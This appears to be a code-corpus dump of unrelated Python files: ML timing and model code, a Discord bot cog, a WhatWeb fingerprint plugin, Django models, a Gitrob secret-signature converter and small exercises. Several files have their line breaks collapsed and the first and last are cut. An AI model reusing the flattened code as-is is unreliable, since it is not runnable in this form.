checkpoint_path="hgcn_chkpt/model.pth" model.load_state_dict(torch.load(checkpoint_path)) logging.info(str(model)) optimizer = getattr(optimizers, args.optimizer)(params=model.parameters(), lr=args.lr, weight_decay=args.weight_decay) lr_scheduler = torch.optim.lr_scheduler.StepLR( optimizer, step_size=int(args.lr_reduce_freq), gamma=float(args.gamma) ) tot_params = sum([np.prod(p.size()) for p in model.parameters()]) logging.info(f"Total number of parameters: {tot_params}") if args.cuda is not None and int(args.cuda) >= 0 : os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda) model = model.to(args.device) for x, val in data.items(): if torch.is_tensor(data[x]): data[x] = data[x].to(args.device) if len(args.time_file) == 0: model.eval() # set evaluation mode embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') else: n_warmup = 50 n_sample = 50 model.eval() # set evaluation mode print("=== Running Warmup Passes") for i in range(0,n_warmup): embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') print("=== Collecting Runtime over ", str(n_sample), " Passes") tic = time.perf_counter() for i in range(0,n_sample): embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') toc = time.perf_counter() avg_runtime = float(toc - tic)/n_sample print("average runtime = ", avg_runtime) # write runtime to file f = open(args.time_file, "w") f.write(str(avg_runtime)+"\n") f.close() if __name__ == '__main__': parser.add_argument('--time_file', type=str, 
default='', help='timing output file') args = parser.parse_args() profiler.start() test(args) profiler.stop()
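

# Optional helper (a sketch, not used by the script above): CUDA kernel
# launches are asynchronous, so wall-clock timings like the loop in test()
# can under-report GPU runtime unless the device is synchronized around
# the timed region.
def timed_average(fn, n_sample=50, sync_cuda=True):
    """Average wall-clock runtime of n_sample calls to fn, synchronizing
    CUDA before and after the timed region when requested."""
    if sync_cuda and torch.cuda.is_available():
        torch.cuda.synchronize()
    tic = time.perf_counter()
    for _ in range(n_sample):
        fn()
    if sync_cuda and torch.cuda.is_available():
        torch.cuda.synchronize()
    return (time.perf_counter() - tic) / n_sample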
StarcoderdataPython
59350
import discord from discord.ext import commands from discord.utils import get class c211(commands.Cog, name="c211"): def __init__(self, bot: commands.Bot): self.bot = bot @commands.command(name='Scorn_Operative_Turncoat', aliases=['c211','Scorn_Operative_17']) async def example_embed(self, ctx): embed = discord.Embed(title='Scorn Operative - Turncoat', color=0x00008B) embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2348936.jpg') embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3 (Scorn Operative)', inline=True) embed.add_field(name='Type (Attribute)', value='Cyberse/Link/Effect (DARK)', inline=False) embed.add_field(name='Link Rating (ATK/Link Arrows)', value='1 (1500/⬇️)', inline=False) embed.add_field(name='Monster Effect', value='1 "Scorn Operative" monster with exactly 2000 ATK\nQuick Effect): You can return 1 "Scorn Operative" non-Effect Monster you control to the hand or Extra Deck; reduce the ATK of 1 monster on the field by 1500, and if you do, increase this card\'s ATK by 1000 until the End Phase.', inline=False) embed.set_footer(text='Set Code: GMMP') await ctx.send(embed=embed) def setup(bot: commands.Bot): bot.add_cog(c211(bot))
StarcoderdataPython
3355878
#!/usr/bin/env python # encoding: utf-8 def run(whatweb, pluginname): whatweb.recog_from_file(pluginname, "login/applyTheme/css/StyleSheet.css", "FE system")
StarcoderdataPython
3273637
<reponame>locationlabs/jsonschema-types """ Factory for schema-based types. """ import sys from inflection import camelize, underscore from jsonschema.compat import urlsplit from jsonschematypes.model import ( Attribute, SchemaAwareDict, SchemaAwareList, SchemaAwareString, DEFAULT, DESCRIPTION, PROPERTIES, REQUIRED, TYPE, ) if sys.version > '3': long = int class TypeFactory(object): """ Factory that knows how to make new model classes for schemas. `TypeFactory` also implements module loader/finder abstractions for fancy imports. """ PRIMITIVE_BASES = { # There's hopefully no good reason to define a custom boolean type # (e.g. with enumerated values) because the only legal values are # True and False *AND* Python doesn't let you extend boolean. # # See: https://mail.python.org/pipermail/python-dev/2002-March/020822.html "boolean": bool, # There are arguments for custom long and float types, but YAGNI. "integer": long, "number": float, } SCHEMA_AWARE_BASES = { "array": SchemaAwareList, "object": SchemaAwareDict, "string": SchemaAwareString, } def __init__(self, registry): self.registry = registry self.classes = {} def class_name_for(self, schema_id): """ Choose a class name for a given schema id. """ path = urlsplit(schema_id).path last = path.split("/")[-1].split(".", 1)[0] return str(camelize(last)) def attribute_name_for(self, property_name): """ Choose an attribute name for a property name. """ return str(underscore(property_name)) def make_class(self, schema_id, extra_bases=()): """ Create a Python class that maps to the given schema. :param extra_bases: extra bases to add to generated types """ if schema_id in self.classes: return self.classes[schema_id] schema = self.registry[schema_id] schema_type = schema.get(TYPE, "object") # skip type generation for primitives if schema_type in TypeFactory.PRIMITIVE_BASES: return TypeFactory.PRIMITIVE_BASES.get(schema_type) base = TypeFactory.SCHEMA_AWARE_BASES[schema_type] bases = (base, ) + extra_bases class_name = self.class_name_for(schema_id) # save backref and metadata within the class definition attributes = dict( _ID=schema_id, _REGISTRY=self.registry, _SCHEMA=schema, ) # include class level doc string if available if DESCRIPTION in schema: attributes["__doc__"] = schema[DESCRIPTION] # inject attributes for each property if schema_type == "object": attributes.update({ self.attribute_name_for(property_name): Attribute( registry=self.registry, key=property_name, description=property_.get(DESCRIPTION), required=property_name in schema.get(REQUIRED, []), default=property_.get(DEFAULT), ) for property_name, property_ in schema.get(PROPERTIES, {}).items() }) # create the class cls = type(class_name, bases, attributes) self.classes[schema_id] = cls return cls
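

if __name__ == "__main__":
    # Usage sketch (assumption: the registry can be any mapping from schema
    # id to schema dict; the library's real registry class is not shown here,
    # and the example schema id and fields are hypothetical).
    registry = {
        "http://example.com/person.json": {
            "type": "object",
            "description": "A person record.",
            "required": ["name"],
            "properties": {
                "name": {"type": "string"},
                "age": {"type": "integer", "default": 0},
            },
        }
    }
    factory = TypeFactory(registry)
    Person = factory.make_class("http://example.com/person.json")
    print(Person.__name__)  # -> "Person"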
StarcoderdataPython
1674601
<reponame>karilint/TaxonManager # Generated by Django 3.2.9 on 2022-04-30 12:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('front', '0004_taxonomicunit_expert'), ] operations = [ migrations.AlterField( model_name='expert', name='exp_comment', field=models.CharField(blank=True, max_length=500, null=True), ), ]
StarcoderdataPython
112436
import fiona as fio def get_features_list(vector_file, feature_key_name): """Function creates feature list in the multipolygon based on the given unique property (feature_key_name) such as ID. :param vector_file: multipolygon file, :param feature_key_name: unique key for features differentiation, :return features_list: list of unique features in the multipolygon.""" features_list = [] with fio.open(vector_file, 'r') as multipolygon: for poly in multipolygon: features_list.append(poly['properties'][feature_key_name]) return features_list
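

if __name__ == "__main__":
    # Example invocation (hypothetical file name and key; adjust to your
    # data): every polygon in fields.shp is expected to carry a unique
    # "ID" property.
    unique_ids = get_features_list("fields.shp", "ID")
    print(f"{len(unique_ids)} features found: {unique_ids}")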
StarcoderdataPython
5346
<reponame>PK-100/Competitive_Programming
import math


def square(n):
    # Returns False when n IS a perfect square, True otherwise. Perfect
    # squares such as 4 and 9 are rejected because their two prime factors
    # are equal.
    tmp = round(math.sqrt(n))
    if tmp * tmp == n:
        return False
    else:
        return True


def semprime(n):
    # True if n is a semiprime (a product of exactly two distinct primes);
    # perfect squares are excluded up front via square().
    ch = 0
    if square(n) == False:
        return False
    for i in range(2, int(math.sqrt(n)) + 1):
        while n % i == 0:
            n //= i
            ch += 1
            if ch >= 2:
                break
    if n > 1:
        ch += 1
    return ch == 2


def check(n):
    if semprime(n) == True:
        return True
    else:
        return False


# For each test case, decide whether n can be written as the sum of two
# semiprimes.
for _ in range(int(input())):
    n = int(input())
    flag = 0
    for i in range(2, n // 2 + 1):
        if check(i) == True and check(n - i) == True:
            # print(i, n - i, square(i), square(n - i), "Yes")
            print("YES")
            flag = 1
            break
    if flag == 0:
        # print(i, n - i, square(i), square(n - i), "No")
        print("NO")
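
# Worked examples (shown as comments so they do not interfere with the
# stdin-driven loop above):
#
#   check(6)  -> True   (6  = 2 * 3, exactly two prime factors, not a square)
#   check(10) -> True   (10 = 2 * 5)
#   check(9)  -> False  (9  = 3 * 3 is a perfect square, rejected by square())
#   check(12) -> False  (12 = 2 * 2 * 3 has three prime factors)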
StarcoderdataPython
40078
""" Script to export a PyTorch-based Pyrado policy to C++ """ import numpy as np import torch as to from rcsenv import ControlPolicy from pyrado.policies.linear import LinearPolicy from pyrado.policies.rnn import RNNPolicy from pyrado.spaces.box import BoxSpace from pyrado.utils.data_types import EnvSpec from pyrado.policies.features import FeatureStack, squared_feat, identity_feat, const_feat def create_nonrecurrent_policy(): return LinearPolicy( EnvSpec( BoxSpace(-1, 1, 4), BoxSpace(-1, 1, 3), ), FeatureStack([ const_feat, identity_feat, squared_feat ]) ) def create_recurrent_policy(): return RNNPolicy( EnvSpec( BoxSpace(-1, 1, 4), BoxSpace(-1, 1, 3), ), hidden_size=32, num_recurrent_layers=1, hidden_nonlin='tanh' ) if __name__ == '__main__': tmpfile = '/tmp/torchscriptsaved.pt' to.set_default_dtype(to.double) # Create a Pyrado policy model = create_nonrecurrent_policy() # model = create_recurrent_policy() # Trace the Pyrado policy (inherits from PyTorch module) traced_script_module = model.trace() print(traced_script_module.graph) # Save the scripted module traced_script_module.save(tmpfile) # Load in C++ cp = ControlPolicy('torch', tmpfile) # Print more digits to.set_printoptions(precision=8, linewidth=200) np.set_printoptions(precision=8, linewidth=200) print(f'manual: {model(to.tensor([1, 2, 3, 4], dtype=to.get_default_dtype()))}') print(f'script: {traced_script_module(to.tensor([1, 2, 3, 4], dtype=to.get_default_dtype()))}') print(f'cpp: {cp(np.array([1, 2, 3, 4]), 3)}')
StarcoderdataPython
1639614
<reponame>unk1nd0n3/bitbucket-creds-checker
# -*- coding: utf-8 -*-
# __version__ = '0.2'

import json


def read_json_file(path):
    """
    Read JSON formatted data from a local file
    :param path: string
    :return: parsed JSON data, or None if the file is missing
    """
    try:
        return json.loads(open(path).read())
    except IOError:
        print("File is missing. Please check")


def write_to_file(filename, data):
    """
    Write string data to a local file
    :param filename: string
    :param data: string
    :return: None
    """
    json_outfile = open(filename, 'w')
    json_outfile.write(data)
    json_outfile.close()


def main():
    """
    Convert Gitrob JSON signatures into Python regex definition lines
    :return: string with the converted signatures
    """
    signatures = read_json_file('gitrob-signatures.txt')
    converted = ''
    for signature in signatures:
        regex = signature['pattern'].replace('\\A', '').replace('\\z', '').replace('\.?', '.?')
        line = '"{0}": re.compile(\'{1}\'),\n'.format(signature['caption'], regex)
        converted += line
    # print(converted)
    write_to_file('converted_gitron.txt', converted)
    return converted


if __name__ == '__main__':
    main()
StarcoderdataPython
3214718
<reponame>ericgroom/simplefrench from django.contrib import admin from .models import Tip # Register your models here. admin.site.register(Tip)
StarcoderdataPython
1672590
<reponame>biochimia/hc2000 import importlib def _resolve(resource): if isinstance(resource, basestring): return importlib.import_module(resource) return resource def register_for_resource(plugin, resource): resource = _resolve(resource) # TODO: There isn't really a need for plugin lists to live in the resource # namespace, they could be maintained in this module. if not hasattr(resource, 'plugins'): resource.plugins = [] resource.plugins.insert(0, plugin) def apply_for_resource(resource, data): resource = _resolve(resource) if not hasattr(resource, 'plugins'): return for plugin in resource.plugins: plugin = _resolve(plugin) if not hasattr(plugin, 'apply'): continue plugin.apply(data)
StarcoderdataPython
1616127
""" Details of all the experiments we run. We do not seek to tune these parameters too much. The parameters here work for baselines. """ def get_experiment(params): if params['env_name'] in ['HalfCheetah-v2','HalfCheetah-v1']: params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] in ['Walker2d-v2']: params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] == 'Swimmer-v2': params['h_dim'] = 16 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1000 elif params['env_name'] == 'BipedalWalker-v2': params['h_dim'] = 32 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 1600 elif params['env_name'] == 'point-v0': params['h_dim'] = 16 params['layers'] = 2 params['sensings'] = 100 params['learning_rate'] = 0.05 params['sigma'] = 0.1 params['steps'] = 50 return(params)
StarcoderdataPython
151720
<reponame>rohitit09/store_app<filename>storeapp/apps/store/models.py
from django.db import models

from apps.user.models import StoreUser

# Create your models here.


class Category(models.Model):
    name = models.CharField(max_length=255)

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = 'Category'
        verbose_name_plural = 'Categories'


class Products(models.Model):
    product_name = models.CharField(max_length=255)
    description = models.TextField()
    mrp = models.DecimalField(max_digits=20, decimal_places=2)
    sale_price = models.DecimalField(max_digits=20, decimal_places=2)
    category = models.ForeignKey(Category, on_delete=models.CASCADE)

    def __str__(self):
        return self.product_name

    class Meta:
        verbose_name = 'Product'
        verbose_name_plural = 'Products'


class Store(models.Model):
    name = models.CharField(max_length=255)
    address = models.TextField()
    products = models.ManyToManyField(Products, blank=True)
    # store_link=models.CharField(max_length=400,primary_key=True,unique=True)

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = 'Store'
        verbose_name_plural = 'Stores'

    def get_absolute_url(self):
        return f"/view_store/{self.id}/"


class Customer(models.Model):
    user = models.OneToOneField(StoreUser, on_delete=models.CASCADE)
    address = models.TextField()
    store = models.ManyToManyField(Store, blank=True)

    def __str__(self):
        return self.user.phone_number

    class Meta:
        verbose_name = 'Customer'
        verbose_name_plural = 'Customers'


class Orders(models.Model):
    choices = (
        ('PENDING', 'PENDING'),
        ('APPROVED', 'APPROVED'),
        ('CANCELED', 'CANCELED')
    )
    status = models.CharField(choices=choices, default='PENDING', max_length=8)
    order_created = models.DateTimeField(auto_now_add=True)
    amount = models.DecimalField(max_digits=20, decimal_places=2)
    quantity = models.IntegerField()
    product = models.ForeignKey(Products, on_delete=models.CASCADE)
    store = models.ForeignKey(Store, on_delete=models.CASCADE)
    customer = models.ForeignKey(Customer, on_delete=models.CASCADE, blank=True, null=True)

    def __str__(self):
        return self.product.product_name

    class Meta:
        verbose_name = 'Order'
        verbose_name_plural = 'Orders'
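
# Usage sketch (requires a configured Django project with this app
# installed; shown as comments because models cannot be exercised outside
# that context, and the values below are illustrative):
#
#   category = Category.objects.create(name="Groceries")
#   product = Products.objects.create(
#       product_name="Rice", description="1 kg bag",
#       mrp=120, sale_price=99, category=category)
#   store = Store.objects.create(name="Corner Shop", address="Main St 1")
#   store.products.add(product)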
StarcoderdataPython
1666562
<filename>pythonExercicios/ex005.py
# Write a program that reads any real number from the keyboard and shows
# its integer part on screen.
import math

num = float(input('Enter a number: '))
print("The integer part of the number {} is {}".format(num, math.trunc(num)))
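
# Note: math.trunc() truncates toward zero, so it yields the integer part
# for negative inputs too, e.g. math.trunc(-3.7) == -3, whereas
# math.floor(-3.7) == -4.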
StarcoderdataPython
4814935
#!/usr/bin/python #/**************************************************************************** # route_plan_class # Copyright (c) 2016, <NAME> <<EMAIL>> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL HENRIK EGEMOSE SCHMIDT BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #****************************************************************************/ from nmea_parser_class import NMEA_data_parser # Import NMEA parser from aqlogreader.AQLogReader import aqLogReader # Import AQLogReader, note that the loaction of the file is in a subfolder from math import pi, sin, cos, atan2 # Import math functionality import matplotlib.pyplot as plt import numpy as np class Route_Plan: #### Constructors ### def __init__(self): return def __init__(self,filename_nmea,filename_aq_log): # Load flight data from NMEA file using the NMEA parser self.data_nmea = NMEA_data_parser(filename_nmea) # Instantiate parser object self.data_nmea.parse() # Parse the data file self.data_aq = aqLogReader(filename_aq_log) # Instantiate object ### Methods ### def get_pos_4DOF_nmea(self): # The NMEA data file does not contain heading information as specified in the exercise, therefore calculate based on 2 points. 
combinedData = []  # Structured as (row-wise) [longitude, latitude, altitude, heading]
        for i in range(len(self.data_nmea.longtitude)):
            if i >= 1:
                # convert NMEA to degrees; NMEA format dddmm.mmmm
                tmp_lon_1_ddd = self.data_nmea.longtitude[i-1][1:3]
                tmp_lon_1_mmmmmm = self.data_nmea.longtitude[i-1][3:]
                tmp_lon_1 = float(tmp_lon_1_ddd) + (float(tmp_lon_1_mmmmmm)/60)
                tmp_lon_2_ddd = self.data_nmea.longtitude[i][1:3]
                tmp_lon_2_mmmmmm = self.data_nmea.longtitude[i][3:]
                tmp_lon_2 = float(tmp_lon_2_ddd) + (float(tmp_lon_2_mmmmmm)/60)
                tmp_lat_1_ddd = self.data_nmea.latitude[i-1][1:3]
                tmp_lat_1_mmmmmm = self.data_nmea.latitude[i-1][3:]
                tmp_lat_1 = float(tmp_lat_1_ddd) + (float(tmp_lat_1_mmmmmm)/60)
                tmp_lat_2_ddd = self.data_nmea.latitude[i][1:3]
                tmp_lat_2_mmmmmm = self.data_nmea.latitude[i][3:]
                tmp_lat_2 = float(tmp_lat_2_ddd) + (float(tmp_lat_2_mmmmmm)/60)

                # convert to rad
                tmp_lon_rad1 = (pi/180)*tmp_lon_1  # lambda1
                tmp_lon_rad2 = (pi/180)*tmp_lon_2  # lambda2
                tmp_lat_rad1 = (pi/180)*tmp_lat_1  # phi1
                tmp_lat_rad2 = (pi/180)*tmp_lat_2  # phi2

                # calculate the initial bearing/heading between the two points
                y = sin(tmp_lon_rad2-tmp_lon_rad1) * cos(tmp_lat_rad2)
                x = cos(tmp_lat_rad1)*sin(tmp_lat_rad2) - sin(tmp_lat_rad1)*cos(tmp_lat_rad2)*cos(tmp_lon_rad2-tmp_lon_rad1)
                brng = atan2(y, x) % (2*pi)  # initial bearing/heading, normalised to [0, 2*pi)

                combinedData.append([self.data_nmea.longtitude[i], self.data_nmea.latitude[i], self.data_nmea.altitude[i], brng])
            else:
                # first fix carries point information only, so no bearing yet
                combinedData.append([self.data_nmea.longtitude[i], self.data_nmea.latitude[i], self.data_nmea.altitude[i], 0])
        return combinedData

    def get_nmea_data(self):
        return self.data_nmea

    def get_aq_data(self):
        return self.data_aq

    def print_aq_info(self):
        print(self.data_aq.printChannelNames())
        return
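

if __name__ == '__main__':
    # Standalone check of the initial-bearing formula used above, with
    # hypothetical coordinates (no NMEA or AQ log files required).
    lat1, lon1 = 55.0 * (pi / 180), 10.0 * (pi / 180)
    lat2, lon2 = 55.1 * (pi / 180), 10.1 * (pi / 180)
    y = sin(lon2 - lon1) * cos(lat2)
    x = cos(lat1) * sin(lat2) - sin(lat1) * cos(lat2) * cos(lon2 - lon1)
    print('initial bearing [deg]:', (atan2(y, x) % (2 * pi)) * 180 / pi)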
StarcoderdataPython
37946
import os import json import pickle import collections import numpy as np from s2and.consts import CONFIG DATA_DIR = CONFIG["main_data_dir"] OUTPUT_DIR = os.path.join(DATA_DIR, "s2and_mini") if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR) # excluding MEDLINE because it has no clusters DATASETS = [ "aminer", "arnetminer", "inspire", "kisti", "pubmed", "qian", "zbmath", ] BIG_BLOCK_CUTOFF = 500 TOP_BLOCKS_TO_KEEP = 1000 # load all of the artifacts of each dataset clusters_all = [] signatures_all = [] X_all = [] keys_all = [] papers_all = [] for dataset in DATASETS: print() print(f"Loading data from {dataset}...") for file_name in os.listdir(os.path.join(DATA_DIR, dataset)): file_name = os.path.join(DATA_DIR, dataset, file_name) if "specter" in file_name: with open(file_name, "rb") as _pickle_file: X, keys = pickle.load(_pickle_file) X_all.append(X) keys_all.append(keys) elif "cluster" in file_name: with open(file_name) as _json_file: clusters = json.load(_json_file) new_clusters = {} for cluster_id, v in clusters.items(): new_cluster_id = f"{dataset}_{cluster_id}" new_v = { "cluster_id": new_cluster_id, "signature_ids": [f"{dataset}_{i}" for i in v["signature_ids"]], "model_version": v["model_version"], } new_clusters[new_cluster_id] = new_v clusters_all.append(new_clusters) elif "paper" in file_name: with open(file_name) as _json_file: papers = json.load(_json_file) papers_all.append(papers) elif "signature" in file_name: with open(file_name) as _json_file: signatures = json.load(_json_file) new_signatures = {} for signature_id, v in signatures.items(): new_signature_id = f"{dataset}_{signature_id}" new_v = { "author_id": v["author_id"], # maybe this needs to be prepended by dataset? "paper_id": v["paper_id"], "signature_id": new_signature_id, "author_info": v["author_info"], } new_signatures[new_signature_id] = new_v signatures_all.append(new_signatures) else: print(f"WARNING: Ignoring {file_name} in {dataset}") print("Finished loading data. Filtering...") # the goal is speed so we'll remove the largest blocks # also only keep top 1000 blocks max # aminer has 32k, inspire has 15k, and kisti has 7k blocks for dataset, s, c, p, X, k in zip(DATASETS, signatures_all, clusters_all, papers_all, X_all, keys_all): blocks = [] for v in s.values(): blocks.append(v["author_info"]["block"]) vc = collections.Counter(blocks) blocks_to_keep = set([k for k, v in sorted(vc.items()) if v <= BIG_BLOCK_CUTOFF][:TOP_BLOCKS_TO_KEEP]) s_filtered = {k: v for k, v in s.items() if v["author_info"]["block"] in blocks_to_keep} # filter the clusters too c_filtered = {k: v for k, v in c.items() if np.all([i in s_filtered for i in v["signature_ids"]])} # go back through the clusters and find the signatures we'll actually need # need to do this because sometimes the block name is just... corrupted # e.g. "g miller" for most signatures but "g mller" for one... signature_keys_to_keep = set() for v in c_filtered.values(): signature_keys_to_keep.update(v["signature_ids"]) s_filtered = {k: v for k, v in s.items() if k in signature_keys_to_keep} # we don't need all the papers anymore. 
just the ones in signatures # also the references of those paper_ids = set([v["paper_id"] for v in s_filtered.values()]) ref_paper_ids = set() for v in p.values(): if v["references"] is not None: ref_paper_ids.update(v["references"]) p_filtered = {k: v for k, v in p.items() if int(k) in paper_ids or int(k) in ref_paper_ids} # filter down the specters to those in papers only since we don't use specters for references keys_filtered_flag = np.array([i in paper_ids for i in k.astype(int)]) k_filtered = k[keys_filtered_flag] X_filtered = X[keys_filtered_flag, :] # save all of the data data_output_dir = os.path.join(DATA_DIR, "s2and_mini", dataset) if not os.path.exists(data_output_dir): os.mkdir(data_output_dir) with open(os.path.join(data_output_dir, f"{dataset}_clusters.json"), "w") as _json_file: json.dump(c_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_signatures.json"), "w") as _json_file: json.dump(s_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_papers.json"), "w") as _json_file: json.dump(p_filtered, _json_file) with open(os.path.join(data_output_dir, f"{dataset}_specter.pickle"), "wb") as _pickle_file: pickle.dump((X_filtered, k_filtered), _pickle_file)
StarcoderdataPython
3284651
import numpy as np import torch import torch.nn as nn import functools import open3d from torch.autograd import Function from .base_model import BaseModel from ...utils import MODEL from ..modules.losses import filter_valid_label from ...datasets.augment import SemsegAugmentation if open3d.core.cuda.device_count() > 0: from open3d.ml.torch.ops import trilinear_devoxelize_forward, trilinear_devoxelize_backward class TrilinearDevoxelization(Function): @staticmethod def forward(ctx, features, coords, resolution, is_training=True): """Forward pass for the Op. Args: ctx: torch Autograd context. coords: the coordinates of points, FloatTensor[B, 3, N] features: FloatTensor[B, C, R, R, R] resolution: int, the voxel resolution. is_training: bool, training mode. Returns: torch.FloatTensor: devoxelized features (B, C, N) """ B, C = features.shape[:2] features = features.contiguous() coords = coords.contiguous() outs, inds, wgts = trilinear_devoxelize_forward(resolution, is_training, coords, features) if is_training: ctx.save_for_backward(inds, wgts) ctx.r = resolution return outs @staticmethod def backward(ctx, grad_output): """Backward pass for the Op. Args: ctx: torch Autograd context grad_output: gradient of outputs, FloatTensor[B, C, N] Returns: torch.FloatTensor: gradient of inputs (B, C, R, R, R) """ inds, wgts = ctx.saved_tensors grad_inputs = trilinear_devoxelize_backward(grad_output.contiguous(), inds, wgts, ctx.r) return grad_inputs.view(grad_output.size(0), grad_output.size(1), ctx.r, ctx.r, ctx.r), None, None, None trilinear_devoxelize = TrilinearDevoxelization.apply class PVCNN(BaseModel): """Semantic Segmentation model. Based on Point Voxel Convolutions. https://arxiv.org/abs/1907.03739 Uses PointNet architecture with separate Point and Voxel processing. Attributes: name: Name of model. Default to "PVCNN". num_classes: Number of classes. num_points: Number of points to sample per pointcloud. extra_feature_channels: Number of extra features. Default to 6 (RGB + Coordinate norms). batcher: Batching method for dataloader. augment: dictionary for augmentation. 
""" blocks = ((64, 1, 32), (64, 2, 16), (128, 1, 16), (1024, 1, None)) def __init__(self, name='PVCNN', device="cuda", num_classes=13, num_points=40960, extra_feature_channels=6, width_multiplier=1, voxel_resolution_multiplier=1, batcher='DefaultBatcher', augment=None, **kwargs): super(PVCNN, self).__init__( name=name, device=device, num_classes=num_classes, num_points=num_points, extra_feature_channels=extra_feature_channels, width_multiplier=width_multiplier, voxel_resolution_multiplier=voxel_resolution_multiplier, batcher=batcher, augment=augment, **kwargs) cfg = self.cfg self.device = device self.augmenter = SemsegAugmentation(cfg.augment) self.in_channels = extra_feature_channels + 3 layers, channels_point, concat_channels_point = create_pointnet_components( blocks=self.blocks, in_channels=self.in_channels, with_se=False, width_multiplier=width_multiplier, voxel_resolution_multiplier=voxel_resolution_multiplier) self.point_features = nn.ModuleList(layers) layers, channels_cloud = create_mlp_components( in_channels=channels_point, out_channels=[256, 128], classifier=False, dim=1, width_multiplier=width_multiplier) self.cloud_features = nn.Sequential(*layers) layers, _ = create_mlp_components( in_channels=(concat_channels_point + channels_cloud), out_channels=[512, 0.3, 256, 0.3, num_classes], classifier=True, dim=2, width_multiplier=width_multiplier) self.classifier = nn.Sequential(*layers) def forward(self, inputs): """Forward pass for the model. Args: inputs: A dict object for inputs with following keys point (torch.float32): Input pointcloud (B, 3, N) feat (torch.float32): Input features (B, 9, N) Returns: torch.float32 : probability distribution (B, N, C). """ coords = inputs['point'].to(self.device) feat = inputs['feat'].to(self.device) out_features_list = [] for i in range(len(self.point_features)): feat, _ = self.point_features[i]((feat, coords)) out_features_list.append(feat) # feat: num_batches * 1024 * num_points -> num_batches * 1024 -> num_batches * 128 feat = self.cloud_features(feat.max(dim=-1, keepdim=False).values) out_features_list.append( feat.unsqueeze(-1).repeat([1, 1, coords.size(-1)])) out = self.classifier(torch.cat(out_features_list, dim=1)) return out.transpose(1, 2) def preprocess(self, data, attr): """Data preprocessing function. This function is called before training to preprocess the data from a dataset. It consists of subsampling and normalizing the pointcloud and creating new features. Args: data: A sample from the dataset. attr: The corresponding attributes. Returns: Returns the preprocessed data """ # If num_workers > 0, use new RNG with unique seed for each thread. # Else, use default RNG. 
if torch.utils.data.get_worker_info(): seedseq = np.random.SeedSequence( torch.utils.data.get_worker_info().seed + torch.utils.data.get_worker_info().id) rng = np.random.default_rng(seedseq.spawn(1)[0]) else: rng = self.rng points = np.array(data['point'], dtype=np.float32) if 'label' not in data or data['label'] is None: labels = np.zeros((points.shape[0],), dtype=np.int32) else: labels = np.array(data['label'], dtype=np.int32).reshape((-1,)) if 'feat' not in data or data['feat'] is None: feat = points.copy() else: feat = np.array(data['feat'], dtype=np.float32) if attr['split'] in ['training', 'train']: points, feat, labels = self.augmenter.augment( points, feat, labels, self.cfg.get('augment', None)) points -= np.min(points, 0) feat = feat / 255.0 # Normalize to [0, 1] max_points_x = np.max(points[:, 0]) max_points_y = np.max(points[:, 1]) max_points_z = np.max(points[:, 2]) x, y, z = np.split(points, (1, 2), axis=-1) norm_x = x / max_points_x norm_y = y / max_points_y norm_z = z / max_points_z feat = np.concatenate([x, y, z, feat, norm_x, norm_y, norm_z], axis=-1) choices = rng.choice(points.shape[0], self.cfg.num_points, replace=(points.shape[0] < self.cfg.num_points)) points = points[choices].transpose() feat = feat[choices].transpose() labels = labels[choices] data = {} data['point'] = points data['feat'] = feat data['label'] = labels return data def transform(self, data, attr): """Transform function for the point cloud and features. This function is called after preprocess method. It consists of converting numpy arrays to torch Tensors. Args: data: A sample from the dataset. attr: The corresponding attributes. Returns: Returns dictionary data with keys (point, feat, label). """ data['point'] = torch.from_numpy(data['point']) data['feat'] = torch.from_numpy(data['feat']) data['label'] = torch.from_numpy(data['label']) return data def update_probs(self, inputs, results, test_probs, test_labels): result = results.reshape(-1, self.cfg.num_classes) probs = torch.nn.functional.softmax(result, dim=-1).cpu().data.numpy() labels = np.argmax(probs, 1) self.trans_point_sampler(patchwise=False) return probs, labels def inference_begin(self, data): data = self.preprocess(data, {'split': 'test'}) data['batch_lengths'] = [data['point'].shape[0]] data = self.transform(data, {}) self.inference_input = data def inference_preprocess(self): return self.inference_input def inference_end(self, inputs, results): results = torch.reshape(results, (-1, 